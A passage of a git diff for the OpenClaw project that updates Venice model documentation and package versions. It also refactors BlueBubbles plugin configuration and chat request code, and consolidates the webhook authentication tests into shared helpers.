80B | 256k | General | +| `qwen3-vl-235b-a22b` | Qwen3 VL 235B (Vision) | 256k | Vision | +| `qwen3-4b` | Venice Small (Qwen3 4B) | 32k | Fast, reasoning | +| `deepseek-v3.2` | DeepSeek V3.2 | 160k | Reasoning, tools disabled | +| `venice-uncensored` | Venice Uncensored (Dolphin-Mistral) | 32k | Uncensored, tools disabled | +| `mistral-31-24b` | Venice Medium (Mistral) | 128k | Vision | +| `google-gemma-3-27b-it` | Google Gemma 3 27B Instruct | 198k | Vision | +| `openai-gpt-oss-120b` | OpenAI GPT OSS 120B | 128k | General | +| `nvidia-nemotron-3-nano-30b-a3b` | NVIDIA Nemotron 3 Nano 30B | 128k | General | +| `olafangensan-glm-4.7-flash-heretic` | GLM 4.7 Flash Heretic | 128k | Reasoning | +| `zai-org-glm-4.6` | GLM 4.6 | 198k | General | +| `zai-org-glm-4.7` | GLM 4.7 | 198k | Reasoning | +| `zai-org-glm-4.7-flash` | GLM 4.7 Flash | 128k | Reasoning | +| `zai-org-glm-5` | GLM 5 | 198k | Reasoning | +| `minimax-m21` | MiniMax M2.1 | 198k | Reasoning | +| `minimax-m25` | MiniMax M2.5 | 198k | Reasoning | -### Anonymized Models (10) — Via Venice Proxy +### Anonymized Models (15) — Via Venice Proxy -| Model ID | Original | Context (tokens) | Features | -| ------------------------ | ----------------- | ---------------- | ----------------- | -| `claude-opus-45` | Claude Opus 4.5 | 202k | Reasoning, vision | -| `claude-sonnet-45` | Claude Sonnet 4.5 | 202k | Reasoning, vision | -| `openai-gpt-52` | GPT-5.2 | 262k | Reasoning | -| `openai-gpt-52-codex` | GPT-5.2 Codex | 262k | Reasoning, vision | -| `gemini-3-pro-preview` | Gemini 3 Pro | 202k | Reasoning, vision | -| `gemini-3-flash-preview` | Gemini 3 Flash | 262k | Reasoning, vision | -| `grok-41-fast` | Grok 4.1 Fast | 262k | Reasoning, vision | -| `grok-code-fast-1` | Grok Code Fast 1 | 262k | Reasoning, code | -| `kimi-k2-thinking` | Kimi K2 Thinking | 262k | Reasoning | -| `minimax-m21` | MiniMax M2.5 | 202k | Reasoning | +| Model ID | Name | Context | Features | +| ------------------------------- | ------------------------------ | ------- | ------------------------- | +| `claude-opus-4-6` | Claude Opus 4.6 (via Venice) | 1M | Reasoning, vision | +| `claude-opus-4-5` | Claude Opus 4.5 (via Venice) | 198k | Reasoning, vision | +| `claude-sonnet-4-6` | Claude Sonnet 4.6 (via Venice) | 1M | Reasoning, vision | +| `claude-sonnet-4-5` | Claude Sonnet 4.5 (via Venice) | 198k | Reasoning, vision | +| `openai-gpt-54` | GPT-5.4 (via Venice) | 1M | Reasoning, vision | +| `openai-gpt-53-codex` | GPT-5.3 Codex (via Venice) | 400k | Reasoning, vision, coding | +| `openai-gpt-52` | GPT-5.2 (via Venice) | 256k | Reasoning | +| `openai-gpt-52-codex` | GPT-5.2 Codex (via Venice) | 256k | Reasoning, vision, coding | +| `openai-gpt-4o-2024-11-20` | GPT-4o (via Venice) | 128k | Vision | +| `openai-gpt-4o-mini-2024-07-18` | GPT-4o Mini (via Venice) | 128k | Vision | +| `gemini-3-1-pro-preview` | Gemini 3.1 Pro (via Venice) | 1M | Reasoning, vision | +| `gemini-3-pro-preview` | Gemini 3 Pro (via Venice) | 198k | Reasoning, vision | +| `gemini-3-flash-preview` | Gemini 3 Flash (via Venice) | 256k | Reasoning, vision | +| `grok-41-fast` | Grok 4.1 Fast (via Venice) | 1M | Reasoning, vision | +| `grok-code-fast-1` | Grok Code Fast 1 (via Venice) | 256k | Reasoning, coding | ## Model Discovery @@ -194,11 +209,11 @@ Venice uses a credit-based system. Check [venice.ai/pricing](https://venice.ai/p ## Usage Examples ```bash -# Use default private model -openclaw agent --model venice/llama-3.3-70b --message "Quick health check" +# Use the default private model +openclaw agent --model venice/kimi-k2-5 --message "Quick health check" -# Use Claude via Venice (anonymized) -openclaw agent --model venice/claude-opus-45 --message "Summarize this task" +# Use Claude Opus via Venice (anonymized) +openclaw agent --model venice/claude-opus-4-6 --message "Summarize this task" # Use uncensored model openclaw agent --model venice/venice-uncensored --message "Draft options" @@ -234,7 +249,7 @@ Venice API is at `https://api.venice.ai/api/v1`. Ensure your network allows HTTP ```json5 { env: { VENICE_API_KEY: "vapi_..." }, - agents: { defaults: { model: { primary: "venice/llama-3.3-70b" } } }, + agents: { defaults: { model: { primary: "venice/kimi-k2-5" } } }, models: { mode: "merge", providers: { @@ -244,13 +259,13 @@ Venice API is at `https://api.venice.ai/api/v1`. Ensure your network allows HTTP api: "openai-completions", models: [ { - id: "llama-3.3-70b", - name: "Llama 3.3 70B", - reasoning: false, - input: ["text"], + id: "kimi-k2-5", + name: "Kimi K2.5", + reasoning: true, + input: ["text", "image"], cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 65536, }, ], }, diff --git a/docs/zh-CN/index.md b/docs/zh-CN/index.md index 65d2db9ea83..3999dc6fda4 100644 --- a/docs/zh-CN/index.md +++ b/docs/zh-CN/index.md @@ -118,7 +118,7 @@ Gateway 网关启动后,打开浏览器控制界面。 - 远程访问:[Web 界面](/web)和 [Tailscale](/gateway/tailscale)

- OpenClaw + OpenClaw

## 配置(可选) diff --git a/extensions/acpx/package.json b/extensions/acpx/package.json index a9d36c1fea4..b60e427122a 100644 --- a/extensions/acpx/package.json +++ b/extensions/acpx/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/acpx", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw ACP runtime backend via acpx", "type": "module", "dependencies": { diff --git a/extensions/bluebubbles/package.json b/extensions/bluebubbles/package.json index bef722d513b..7a381ee85ff 100644 --- a/extensions/bluebubbles/package.json +++ b/extensions/bluebubbles/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/bluebubbles", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw BlueBubbles channel plugin", "type": "module", "dependencies": { diff --git a/extensions/bluebubbles/src/channel.ts b/extensions/bluebubbles/src/channel.ts index e00364cf115..741f93d3ae0 100644 --- a/extensions/bluebubbles/src/channel.ts +++ b/extensions/bluebubbles/src/channel.ts @@ -6,6 +6,7 @@ import type { import { applyAccountNameToChannelSection, buildChannelConfigSchema, + buildComputedAccountStatusSnapshot, buildProbeChannelStatusSummary, collectBlueBubblesStatusIssues, DEFAULT_ACCOUNT_ID, @@ -25,6 +26,7 @@ import { resolveDefaultBlueBubblesAccountId, } from "./accounts.js"; import { bluebubblesMessageActions } from "./actions.js"; +import { applyBlueBubblesConnectionConfig } from "./config-apply.js"; import { BlueBubblesConfigSchema } from "./config-schema.js"; import { sendBlueBubblesMedia } from "./media-send.js"; import { resolveBlueBubblesMessageId } from "./monitor.js"; @@ -255,40 +257,27 @@ export const bluebubblesPlugin: ChannelPlugin = { }) : namedConfig; if (accountId === DEFAULT_ACCOUNT_ID) { - return { - ...next, - channels: { - ...next.channels, - bluebubbles: { - ...next.channels?.bluebubbles, - enabled: true, - ...(input.httpUrl ? { serverUrl: input.httpUrl } : {}), - ...(input.password ? { password: input.password } : {}), - ...(input.webhookPath ? { webhookPath: input.webhookPath } : {}), - }, + return applyBlueBubblesConnectionConfig({ + cfg: next, + accountId, + patch: { + serverUrl: input.httpUrl, + password: input.password, + webhookPath: input.webhookPath, }, - } as OpenClawConfig; + onlyDefinedFields: true, + }); } - return { - ...next, - channels: { - ...next.channels, - bluebubbles: { - ...next.channels?.bluebubbles, - enabled: true, - accounts: { - ...next.channels?.bluebubbles?.accounts, - [accountId]: { - ...next.channels?.bluebubbles?.accounts?.[accountId], - enabled: true, - ...(input.httpUrl ? { serverUrl: input.httpUrl } : {}), - ...(input.password ? { password: input.password } : {}), - ...(input.webhookPath ? { webhookPath: input.webhookPath } : {}), - }, - }, - }, + return applyBlueBubblesConnectionConfig({ + cfg: next, + accountId, + patch: { + serverUrl: input.httpUrl, + password: input.password, + webhookPath: input.webhookPath, }, - } as OpenClawConfig; + onlyDefinedFields: true, + }); }, }, pairing: { @@ -372,20 +361,18 @@ export const bluebubblesPlugin: ChannelPlugin = { buildAccountSnapshot: ({ account, runtime, probe }) => { const running = runtime?.running ?? false; const probeOk = (probe as BlueBubblesProbe | undefined)?.ok; - return { + const base = buildComputedAccountStatusSnapshot({ accountId: account.accountId, name: account.name, enabled: account.enabled, configured: account.configured, - baseUrl: account.baseUrl, - running, - connected: probeOk ?? running, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: runtime?.lastError ?? null, + runtime, probe, - lastInboundAt: runtime?.lastInboundAt ?? null, - lastOutboundAt: runtime?.lastOutboundAt ?? null, + }); + return { + ...base, + baseUrl: account.baseUrl, + connected: probeOk ?? running, }; }, }, diff --git a/extensions/bluebubbles/src/chat.ts b/extensions/bluebubbles/src/chat.ts index 5489077eaca..b63f09272f2 100644 --- a/extensions/bluebubbles/src/chat.ts +++ b/extensions/bluebubbles/src/chat.ts @@ -30,6 +30,39 @@ function resolvePartIndex(partIndex: number | undefined): number { return typeof partIndex === "number" ? partIndex : 0; } +async function sendBlueBubblesChatEndpointRequest(params: { + chatGuid: string; + opts: BlueBubblesChatOpts; + endpoint: "read" | "typing"; + method: "POST" | "DELETE"; + action: "read" | "typing"; +}): Promise { + const trimmed = params.chatGuid.trim(); + if (!trimmed) { + return; + } + const { baseUrl, password, accountId } = resolveAccount(params.opts); + if (getCachedBlueBubblesPrivateApiStatus(accountId) === false) { + return; + } + const url = buildBlueBubblesApiUrl({ + baseUrl, + path: `/api/v1/chat/${encodeURIComponent(trimmed)}/${params.endpoint}`, + password, + }); + const res = await blueBubblesFetchWithTimeout( + url, + { method: params.method }, + params.opts.timeoutMs, + ); + if (!res.ok) { + const errorText = await res.text().catch(() => ""); + throw new Error( + `BlueBubbles ${params.action} failed (${res.status}): ${errorText || "unknown"}`, + ); + } +} + async function sendPrivateApiJsonRequest(params: { opts: BlueBubblesChatOpts; feature: string; @@ -65,24 +98,13 @@ export async function markBlueBubblesChatRead( chatGuid: string, opts: BlueBubblesChatOpts = {}, ): Promise { - const trimmed = chatGuid.trim(); - if (!trimmed) { - return; - } - const { baseUrl, password, accountId } = resolveAccount(opts); - if (getCachedBlueBubblesPrivateApiStatus(accountId) === false) { - return; - } - const url = buildBlueBubblesApiUrl({ - baseUrl, - path: `/api/v1/chat/${encodeURIComponent(trimmed)}/read`, - password, + await sendBlueBubblesChatEndpointRequest({ + chatGuid, + opts, + endpoint: "read", + method: "POST", + action: "read", }); - const res = await blueBubblesFetchWithTimeout(url, { method: "POST" }, opts.timeoutMs); - if (!res.ok) { - const errorText = await res.text().catch(() => ""); - throw new Error(`BlueBubbles read failed (${res.status}): ${errorText || "unknown"}`); - } } export async function sendBlueBubblesTyping( @@ -90,28 +112,13 @@ export async function sendBlueBubblesTyping( typing: boolean, opts: BlueBubblesChatOpts = {}, ): Promise { - const trimmed = chatGuid.trim(); - if (!trimmed) { - return; - } - const { baseUrl, password, accountId } = resolveAccount(opts); - if (getCachedBlueBubblesPrivateApiStatus(accountId) === false) { - return; - } - const url = buildBlueBubblesApiUrl({ - baseUrl, - path: `/api/v1/chat/${encodeURIComponent(trimmed)}/typing`, - password, + await sendBlueBubblesChatEndpointRequest({ + chatGuid, + opts, + endpoint: "typing", + method: typing ? "POST" : "DELETE", + action: "typing", }); - const res = await blueBubblesFetchWithTimeout( - url, - { method: typing ? "POST" : "DELETE" }, - opts.timeoutMs, - ); - if (!res.ok) { - const errorText = await res.text().catch(() => ""); - throw new Error(`BlueBubbles typing failed (${res.status}): ${errorText || "unknown"}`); - } } /** diff --git a/extensions/bluebubbles/src/config-apply.ts b/extensions/bluebubbles/src/config-apply.ts new file mode 100644 index 00000000000..70b8c7cae37 --- /dev/null +++ b/extensions/bluebubbles/src/config-apply.ts @@ -0,0 +1,77 @@ +import { DEFAULT_ACCOUNT_ID, type OpenClawConfig } from "openclaw/plugin-sdk/bluebubbles"; + +type BlueBubblesConfigPatch = { + serverUrl?: string; + password?: unknown; + webhookPath?: string; +}; + +type AccountEnabledMode = boolean | "preserve-or-true"; + +function normalizePatch( + patch: BlueBubblesConfigPatch, + onlyDefinedFields: boolean, +): BlueBubblesConfigPatch { + if (!onlyDefinedFields) { + return patch; + } + const next: BlueBubblesConfigPatch = {}; + if (patch.serverUrl !== undefined) { + next.serverUrl = patch.serverUrl; + } + if (patch.password !== undefined) { + next.password = patch.password; + } + if (patch.webhookPath !== undefined) { + next.webhookPath = patch.webhookPath; + } + return next; +} + +export function applyBlueBubblesConnectionConfig(params: { + cfg: OpenClawConfig; + accountId: string; + patch: BlueBubblesConfigPatch; + onlyDefinedFields?: boolean; + accountEnabled?: AccountEnabledMode; +}): OpenClawConfig { + const patch = normalizePatch(params.patch, params.onlyDefinedFields === true); + if (params.accountId === DEFAULT_ACCOUNT_ID) { + return { + ...params.cfg, + channels: { + ...params.cfg.channels, + bluebubbles: { + ...params.cfg.channels?.bluebubbles, + enabled: true, + ...patch, + }, + }, + }; + } + + const currentAccount = params.cfg.channels?.bluebubbles?.accounts?.[params.accountId]; + const enabled = + params.accountEnabled === "preserve-or-true" + ? (currentAccount?.enabled ?? true) + : (params.accountEnabled ?? true); + + return { + ...params.cfg, + channels: { + ...params.cfg.channels, + bluebubbles: { + ...params.cfg.channels?.bluebubbles, + enabled: true, + accounts: { + ...params.cfg.channels?.bluebubbles?.accounts, + [params.accountId]: { + ...currentAccount, + enabled, + ...patch, + }, + }, + }, + }, + }; +} diff --git a/extensions/bluebubbles/src/config-schema.test.ts b/extensions/bluebubbles/src/config-schema.test.ts index 5bf66704d35..308ee9732b5 100644 --- a/extensions/bluebubbles/src/config-schema.test.ts +++ b/extensions/bluebubbles/src/config-schema.test.ts @@ -5,7 +5,7 @@ describe("BlueBubblesConfigSchema", () => { it("accepts account config when serverUrl and password are both set", () => { const parsed = BlueBubblesConfigSchema.safeParse({ serverUrl: "http://localhost:1234", - password: "secret", + password: "secret", // pragma: allowlist secret }); expect(parsed.success).toBe(true); }); diff --git a/extensions/bluebubbles/src/monitor-normalize.ts b/extensions/bluebubbles/src/monitor-normalize.ts index e591f21dfb9..22705e6b12c 100644 --- a/extensions/bluebubbles/src/monitor-normalize.ts +++ b/extensions/bluebubbles/src/monitor-normalize.ts @@ -1,3 +1,4 @@ +import { parseFiniteNumber } from "../../../src/infra/parse-finite-number.js"; import { extractHandleFromChatGuid, normalizeBlueBubblesHandle } from "./targets.js"; import type { BlueBubblesAttachment } from "./types.js"; @@ -35,17 +36,7 @@ function readNumberLike(record: Record | null, key: string): nu if (!record) { return undefined; } - const value = record[key]; - if (typeof value === "number" && Number.isFinite(value)) { - return value; - } - if (typeof value === "string") { - const parsed = Number.parseFloat(value); - if (Number.isFinite(parsed)) { - return parsed; - } - } - return undefined; + return parseFiniteNumber(record[key]); } function extractAttachments(message: Record): BlueBubblesAttachment[] { diff --git a/extensions/bluebubbles/src/monitor.webhook-auth.test.ts b/extensions/bluebubbles/src/monitor.webhook-auth.test.ts index 9dd8e6f470b..201216c89ca 100644 --- a/extensions/bluebubbles/src/monitor.webhook-auth.test.ts +++ b/extensions/bluebubbles/src/monitor.webhook-auth.test.ts @@ -240,6 +240,15 @@ function getFirstDispatchCall(): DispatchReplyParams { } describe("BlueBubbles webhook monitor", () => { + const WEBHOOK_PATH = "/bluebubbles-webhook"; + const BASE_WEBHOOK_MESSAGE_DATA = { + text: "hello", + handle: { address: "+15551234567" }, + isGroup: false, + isFromMe: false, + guid: "msg-1", + } as const; + let unregister: () => void; beforeEach(() => { @@ -261,122 +270,144 @@ describe("BlueBubbles webhook monitor", () => { unregister?.(); }); + function createWebhookPayload( + dataOverrides: Record = {}, + ): Record { + return { + type: "new-message", + data: { + ...BASE_WEBHOOK_MESSAGE_DATA, + ...dataOverrides, + }, + }; + } + + function createWebhookTargetDeps(core?: PluginRuntime): { + config: OpenClawConfig; + core: PluginRuntime; + runtime: { + log: ReturnType void>>; + error: ReturnType void>>; + }; + } { + const resolvedCore = core ?? createMockRuntime(); + setBlueBubblesRuntime(resolvedCore); + return { + config: {}, + core: resolvedCore, + runtime: { + log: vi.fn<(message: string) => void>(), + error: vi.fn<(message: string) => void>(), + }, + }; + } + + function registerWebhookTarget( + params: { + account?: ResolvedBlueBubblesAccount; + config?: OpenClawConfig; + core?: PluginRuntime; + runtime?: { + log: ReturnType void>>; + error: ReturnType void>>; + }; + path?: string; + statusSink?: Parameters[0]["statusSink"]; + trackForCleanup?: boolean; + } = {}, + ): { + config: OpenClawConfig; + core: PluginRuntime; + runtime: { + log: ReturnType void>>; + error: ReturnType void>>; + }; + stop: () => void; + } { + const deps = + params.config && params.core && params.runtime + ? { config: params.config, core: params.core, runtime: params.runtime } + : createWebhookTargetDeps(params.core); + const stop = registerBlueBubblesWebhookTarget({ + account: params.account ?? createMockAccount(), + ...deps, + path: params.path ?? WEBHOOK_PATH, + statusSink: params.statusSink, + }); + if (params.trackForCleanup !== false) { + unregister = stop; + } + return { ...deps, stop }; + } + + async function sendWebhookRequest(params: { + method?: string; + url?: string; + body?: unknown; + headers?: Record; + remoteAddress?: string; + }): Promise<{ + req: IncomingMessage; + res: ServerResponse & { body: string; statusCode: number }; + handled: boolean; + }> { + const req = createMockRequest( + params.method ?? "POST", + params.url ?? WEBHOOK_PATH, + params.body ?? createWebhookPayload(), + params.headers, + ); + if (params.remoteAddress) { + (req as unknown as { socket: { remoteAddress: string } }).socket = { + remoteAddress: params.remoteAddress, + }; + } + const res = createMockResponse(); + const handled = await handleBlueBubblesWebhookRequest(req, res); + return { req, res, handled }; + } + describe("webhook parsing + auth handling", () => { it("rejects non-POST requests", async () => { - const account = createMockAccount(); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget(); + const { handled, res } = await sendWebhookRequest({ + method: "GET", + body: {}, }); - const req = createMockRequest("GET", "/bluebubbles-webhook", {}); - const res = createMockResponse(); - - const handled = await handleBlueBubblesWebhookRequest(req, res); - expect(handled).toBe(true); expect(res.statusCode).toBe(405); }); it("accepts POST requests with valid JSON payload", async () => { - const account = createMockAccount(); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget(); + const { handled, res } = await sendWebhookRequest({ + body: createWebhookPayload({ date: Date.now() }), }); - const payload = { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - date: Date.now(), - }, - }; - - const req = createMockRequest("POST", "/bluebubbles-webhook", payload); - const res = createMockResponse(); - - const handled = await handleBlueBubblesWebhookRequest(req, res); - expect(handled).toBe(true); expect(res.statusCode).toBe(200); expect(res.body).toBe("ok"); }); it("rejects requests with invalid JSON", async () => { - const account = createMockAccount(); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget(); + const { handled, res } = await sendWebhookRequest({ + body: "invalid json {{", }); - const req = createMockRequest("POST", "/bluebubbles-webhook", "invalid json {{"); - const res = createMockResponse(); - - const handled = await handleBlueBubblesWebhookRequest(req, res); - expect(handled).toBe(true); expect(res.statusCode).toBe(400); }); it("accepts URL-encoded payload wrappers", async () => { - const account = createMockAccount(); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", - }); - - const payload = { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - date: Date.now(), - }, - }; + registerWebhookTarget(); + const payload = createWebhookPayload({ date: Date.now() }); const encodedBody = new URLSearchParams({ payload: JSON.stringify(payload), }).toString(); - const req = createMockRequest("POST", "/bluebubbles-webhook", encodedBody); - const res = createMockResponse(); - - const handled = await handleBlueBubblesWebhookRequest(req, res); + const { handled, res } = await sendWebhookRequest({ body: encodedBody }); expect(handled).toBe(true); expect(res.statusCode).toBe(200); @@ -386,23 +417,12 @@ describe("BlueBubbles webhook monitor", () => { it("returns 408 when request body times out (Slow-Loris protection)", async () => { vi.useFakeTimers(); try { - const account = createMockAccount(); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", - }); + registerWebhookTarget(); // Create a request that never sends data or ends (simulates slow-loris) const req = new EventEmitter() as IncomingMessage; req.method = "POST"; - req.url = "/bluebubbles-webhook?password=test-password"; + req.url = `${WEBHOOK_PATH}?password=test-password`; req.headers = {}; (req as unknown as { socket: { remoteAddress: string } }).socket = { remoteAddress: "127.0.0.1", @@ -426,22 +446,13 @@ describe("BlueBubbles webhook monitor", () => { }); it("rejects unauthorized requests before reading the body", async () => { - const account = createMockAccount({ password: "secret-token" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget({ + account: createMockAccount({ password: "secret-token" }), }); const req = new EventEmitter() as IncomingMessage; req.method = "POST"; - req.url = "/bluebubbles-webhook?password=wrong-token"; + req.url = `${WEBHOOK_PATH}?password=wrong-token`; req.headers = {}; const onSpy = vi.spyOn(req, "on"); (req as unknown as { socket: { remoteAddress: string } }).socket = { @@ -457,112 +468,43 @@ describe("BlueBubbles webhook monitor", () => { }); it("authenticates via password query parameter", async () => { - const account = createMockAccount({ password: "secret-token" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - // Mock non-localhost request - const req = createMockRequest("POST", "/bluebubbles-webhook?password=secret-token", { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, + registerWebhookTarget({ + account: createMockAccount({ password: "secret-token" }), }); - (req as unknown as { socket: { remoteAddress: string } }).socket = { + const { handled, res } = await sendWebhookRequest({ + url: `${WEBHOOK_PATH}?password=secret-token`, + body: createWebhookPayload(), remoteAddress: "192.168.1.100", - }; - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", }); - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); - expect(handled).toBe(true); expect(res.statusCode).toBe(200); }); it("authenticates via x-password header", async () => { - const account = createMockAccount({ password: "secret-token" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - const req = createMockRequest( - "POST", - "/bluebubbles-webhook", - { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, - }, - { "x-password": "secret-token" }, - ); - (req as unknown as { socket: { remoteAddress: string } }).socket = { - remoteAddress: "192.168.1.100", - }; - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", + registerWebhookTarget({ + account: createMockAccount({ password: "secret-token" }), + }); + const { handled, res } = await sendWebhookRequest({ + body: createWebhookPayload(), + headers: { "x-password": "secret-token" }, + remoteAddress: "192.168.1.100", }); - - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); expect(handled).toBe(true); expect(res.statusCode).toBe(200); }); it("rejects unauthorized requests with wrong password", async () => { - const account = createMockAccount({ password: "secret-token" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - const req = createMockRequest("POST", "/bluebubbles-webhook?password=wrong-token", { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, + registerWebhookTarget({ + account: createMockAccount({ password: "secret-token" }), }); - (req as unknown as { socket: { remoteAddress: string } }).socket = { + const { handled, res } = await sendWebhookRequest({ + url: `${WEBHOOK_PATH}?password=wrong-token`, + body: createWebhookPayload(), remoteAddress: "192.168.1.100", - }; - - unregister = registerBlueBubblesWebhookTarget({ - account, - config, - runtime: { log: vi.fn(), error: vi.fn() }, - core, - path: "/bluebubbles-webhook", }); - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); - expect(handled).toBe(true); expect(res.statusCode).toBe(401); }); @@ -570,50 +512,37 @@ describe("BlueBubbles webhook monitor", () => { it("rejects ambiguous routing when multiple targets match the same password", async () => { const accountA = createMockAccount({ password: "secret-token" }); const accountB = createMockAccount({ password: "secret-token" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); + const { config, core, runtime } = createWebhookTargetDeps(); const sinkA = vi.fn(); const sinkB = vi.fn(); - const req = createMockRequest("POST", "/bluebubbles-webhook?password=secret-token", { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, - }); - (req as unknown as { socket: { remoteAddress: string } }).socket = { - remoteAddress: "192.168.1.100", - }; - - const unregisterA = registerBlueBubblesWebhookTarget({ + const unregisterA = registerWebhookTarget({ account: accountA, config, - runtime: { log: vi.fn(), error: vi.fn() }, + runtime, core, - path: "/bluebubbles-webhook", + trackForCleanup: false, statusSink: sinkA, - }); - const unregisterB = registerBlueBubblesWebhookTarget({ + }).stop; + const unregisterB = registerWebhookTarget({ account: accountB, config, - runtime: { log: vi.fn(), error: vi.fn() }, + runtime, core, - path: "/bluebubbles-webhook", + trackForCleanup: false, statusSink: sinkB, - }); + }).stop; unregister = () => { unregisterA(); unregisterB(); }; - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); + const { handled, res } = await sendWebhookRequest({ + url: `${WEBHOOK_PATH}?password=secret-token`, + body: createWebhookPayload(), + remoteAddress: "192.168.1.100", + }); expect(handled).toBe(true); expect(res.statusCode).toBe(401); @@ -624,50 +553,37 @@ describe("BlueBubbles webhook monitor", () => { it("ignores targets without passwords when a password-authenticated target matches", async () => { const accountStrict = createMockAccount({ password: "secret-token" }); const accountWithoutPassword = createMockAccount({ password: undefined }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); + const { config, core, runtime } = createWebhookTargetDeps(); const sinkStrict = vi.fn(); const sinkWithoutPassword = vi.fn(); - const req = createMockRequest("POST", "/bluebubbles-webhook?password=secret-token", { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, - }); - (req as unknown as { socket: { remoteAddress: string } }).socket = { - remoteAddress: "192.168.1.100", - }; - - const unregisterStrict = registerBlueBubblesWebhookTarget({ + const unregisterStrict = registerWebhookTarget({ account: accountStrict, config, - runtime: { log: vi.fn(), error: vi.fn() }, + runtime, core, - path: "/bluebubbles-webhook", + trackForCleanup: false, statusSink: sinkStrict, - }); - const unregisterNoPassword = registerBlueBubblesWebhookTarget({ + }).stop; + const unregisterNoPassword = registerWebhookTarget({ account: accountWithoutPassword, config, - runtime: { log: vi.fn(), error: vi.fn() }, + runtime, core, - path: "/bluebubbles-webhook", + trackForCleanup: false, statusSink: sinkWithoutPassword, - }); + }).stop; unregister = () => { unregisterStrict(); unregisterNoPassword(); }; - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); + const { handled, res } = await sendWebhookRequest({ + url: `${WEBHOOK_PATH}?password=secret-token`, + body: createWebhookPayload(), + remoteAddress: "192.168.1.100", + }); expect(handled).toBe(true); expect(res.statusCode).toBe(200); @@ -677,34 +593,20 @@ describe("BlueBubbles webhook monitor", () => { it("requires authentication for loopback requests when password is configured", async () => { const account = createMockAccount({ password: "secret-token" }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); + const { config, core, runtime } = createWebhookTargetDeps(); for (const remoteAddress of ["127.0.0.1", "::1", "::ffff:127.0.0.1"]) { - const req = createMockRequest("POST", "/bluebubbles-webhook", { - type: "new-message", - data: { - text: "hello", - handle: { address: "+15551234567" }, - isGroup: false, - isFromMe: false, - guid: "msg-1", - }, - }); - (req as unknown as { socket: { remoteAddress: string } }).socket = { - remoteAddress, - }; - - const loopbackUnregister = registerBlueBubblesWebhookTarget({ + const loopbackUnregister = registerWebhookTarget({ account, config, - runtime: { log: vi.fn(), error: vi.fn() }, + runtime, core, - path: "/bluebubbles-webhook", - }); + trackForCleanup: false, + }).stop; - const res = createMockResponse(); - const handled = await handleBlueBubblesWebhookRequest(req, res); + const { handled, res } = await sendWebhookRequest({ + body: createWebhookPayload(), + remoteAddress, + }); expect(handled).toBe(true); expect(res.statusCode).toBe(401); @@ -713,17 +615,8 @@ describe("BlueBubbles webhook monitor", () => { }); it("rejects targets without passwords for loopback and proxied-looking requests", async () => { - const account = createMockAccount({ password: undefined }); - const config: OpenClawConfig = {}; - const core = createMockRuntime(); - setBlueBubblesRuntime(core); - - unregister = 